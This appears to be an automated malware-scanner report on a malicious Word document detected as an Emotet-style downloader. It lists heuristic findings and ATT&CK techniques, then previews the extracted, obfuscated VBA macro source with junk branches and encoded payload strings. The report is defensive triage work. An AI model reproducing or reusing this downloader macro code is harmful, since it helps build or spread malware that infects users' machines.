MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that utilizes CreateObject. Heuristics indicate it's a legacy WordBasic auto-exec marker and an Excel 4.0 macro sheet. ClamAV identifies it as Doc.Malware.Emodldr-10025032-0, suggesting it acts as a downloader for a second-stage payload.
Heuristics 9
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58983 bytes |
SHA-256: cef7ed3e7cd7dd15880f3b104a26adb957c8d037d4773e7f39741e5f8f2464a3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 18 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "lwOUqUE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zWJHKDd"
Function btjhYladNwftoG()
On Error Resume Next
Select Case BEmKk
Case 84877
ZYwudG = CStr(pshnH + CStr(24138) - nbMwXE * 75465)
Case 33704
MprCLD = BtaWE
BmHAo = Tan(41169 * vmvMaN)
End Select
TFSjAYa = OmVKU("Y3u5d0ADUAMgBhADMANABkADgAZABmADIAYQA3AGUANQBhADUAMAA4ADgANQA0ADEAZQAyAGIANQAyAGMAMwdS", 6, 79)
Select Case aOMnnH
Case 85265
FmDDmZ = CStr(uhpjda + CStr(49802) - XQRklZ * 88134)
Case 59987
zZsnjm = wSPjUw
iHOsOW = Tan(87093 * DAZpWV)
End Select
Select Case CACLs
Case 49490
ijIdXb = CStr(aWoPbo + CStr(62977) - qJpWwY * 68159)
Case 65862
Itarkd = FTCKF
sGSiZ = Tan(72502 * riJfQK)
End Select
aUllF = OmVKU("dCG6SgAZgBlADUAZQBiADEAZQBiAa%5B", 6, 23)
Select Case WWbPvB
Case 19288
iAnqt = CStr(JImVf + CStr(37421) - jETzz * 94632)
Case 14513
juaZkw = smPEMX
RqjrRh = Tan(42577 * Jlrbn)
End Select
Select Case MZczwX
Case 69299
Bohiz = CStr(inGUa + CStr(52948) - zzpFkh * 71907)
Case 95159
uPknVG = iEUoI
totkbf = Tan(42677 * IOzOP)
End Select
itRaOOiwCWu = OmVKU("wjQAwADMANgAyADIAMABiADIAYgBjAGYAZABhAGIANQA2AGUAOQAzAGQANgA2ADAAMAAxAGMAMQA0ADEANAA4ADMAMwA1ADEAZABjADMANQAyADcAMABkAGEAMwA4ADUAMAA1ADgAMgBjADAAMAAyADgANQBiol6kNm", 3, 155)
Select Case ntMqw
Case 42290
uSuJEX = CStr(cQGnZP + CStr(11077) - MzFFb * 3322)
Case 72211
kZFhO = rdpmGz
zaWHl = Tan(93358 * IMpATm)
End Select
Select Case YWiKh
Case 53006
ZNJfO = CStr(ThorCn + CStr(23619) - jFofnU * 31378)
Case 47129
OJOwjw = qNcUp
bVida = Tan(13466 * szGQn)
End Select
ZnoNSUFuYZ = OmVKU("uMAOQA3ADUAFAXFJ", 2, 10)
Select Case RuftHj
Case 2694
uWAAk = CStr(hApKsm + CStr(41081) - SBJtJS * 6228)
Case 32321
wLrhN = TVknt
zddqXY = Tan(84455 * vYAWn)
End Select
Select Case tvvmwr
Case 10867
pIVAJ = CStr(YDcaf + CStr(95473) - PcjUw * 21774)
Case 47863
UuAZS = zuVJM
ZzuAL = Tan(37054 * zEGhH)
End Select
RkkEYL = OmVKU("6o,MAOQA4AGYAZgA0ADIAYwAzAGIAYgBjADEAMQBhAGQAOAA3ADcAYQBmADgAMABjAGEAYwAQ4DdjO", 4, 69)
Select Case ddTPSz
Case 61809
BVOUbq = CStr(ZJHQS + CStr(86275) - QifIfr * 48469)
Case 18314
Mtqpi = iDMjYX
fjkcTa = Tan(89135 * QoqiNk)
End Select
Select Case uZaaR
Case 317
lCiwq = CStr(IHiaH + CStr(5137) - ZiOirj * 57405)
Case 70498
HRTLJ = LoqqcY
TGwPk = Tan(54270 * hUwol)
End Select
rXfOcNS = OmVKU("d1jAGYAZgBlADMAMgA4AGIAYQA0ADUAZABhAGUAYwA0ADYANgA4ADkAYwA1ADUAMwBmADQAZgBkADgAYQBlADEAMgAwADcAZQAwADQAZgBkADIAYgA0AGQAYwBmADUANwBjAGIAMQA5AGMAYgBlADkANgAzADAAOABlADNNA40", 3, 163)
Select Case LKsjiW
Case 67009
vMdfDS = CStr(pkRZFF + CStr(28987) - mczBh * 36952)
Case 73763
iZKfB = GIGpjX
TkjKGr = Tan(70509 * OftwDG)
End Select
Select Case LzMfUP
Case 54209
TTfvdI = CStr(jIIOb + CStr(11571) - lUMSOz * 56981)
Case 71745
nRbdp = kJKNN
Offboz = Tan(88122 * YMdXML)
End Select
zjuSJi = OmVKU("90jgA1ADIAMABlADQAYwA4ADMAOABiADUAMAAwADIANAAyADcA6KnYX", 4, 47)
Select Case TBAfQi
Case 10623
dBiNhX = CStr(DNsQXp + CStr(61951) - ZzjIpb * 77539)
Case 7187
dKRHK = wAJnCa
lMEZI = Tan(30349 * woCnLa)
End Select
Select Case SKjFjD
Case 76071
mNIUBZ = CStr(GFuZwC + CStr(6520) - dWkHH * 8516)
Case 86553
UtGsK = QPudkG
FHuiwZ = Tan(65938 * FTlPC)
End Select
hJwwU = OmVKU("XVhANwBlAGEAOAA2ADkAOQBkAGEANwAwADkANQBkA
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.